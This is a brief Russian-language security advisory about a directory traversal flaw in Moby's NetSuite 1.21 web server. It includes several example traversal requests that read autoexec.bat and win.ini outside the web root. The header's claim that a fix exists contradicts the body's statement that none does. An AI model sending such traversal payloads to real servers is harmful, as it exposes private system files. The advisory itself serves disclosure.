Security Lab

Просмотр произвольных файлов на системе в Moby's NetSuite

Дата публикации:18.07.2003
Всего просмотров:1039
Опасность:
Средняя
Наличие исправления: Да
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации: Удаленная
Воздействие: Раскрытие важных данных
Раскрытие системных данных
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты: Moby NetSuite 1.x
Описание: Уязвимость обнаружена в Moby's NetSuite в компоненте Web сервера. Удаленный пользователь может просматривать файлы на системе, которые расположены вне Web директории.

Удаленный пользователь может представить специально обработанный URL, содержащий символы обхода каталога, чтобы просматривать произвольные файлы на системе. Пример:

GET / HTTP/1.1
Host: /error/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cautoexec.bat


http://127.0.0.1/%5c..%5c..%5c..%5cwindows%5cwin.ini
http://127.0.0.1/%5c..%5c..%5c..%5cwindows%5cwin%2eini
http://1 27.0.0.1/\..\..\..\windows\win.ini
Уязвимость обнаружена в Moby's NetSuite 1.21

Способов устранения обнаруженной уязвимости не существует в настоящее время.

Ссылки: dr_insane||Moby's Netsuite 1.21 Traversal Directory bugs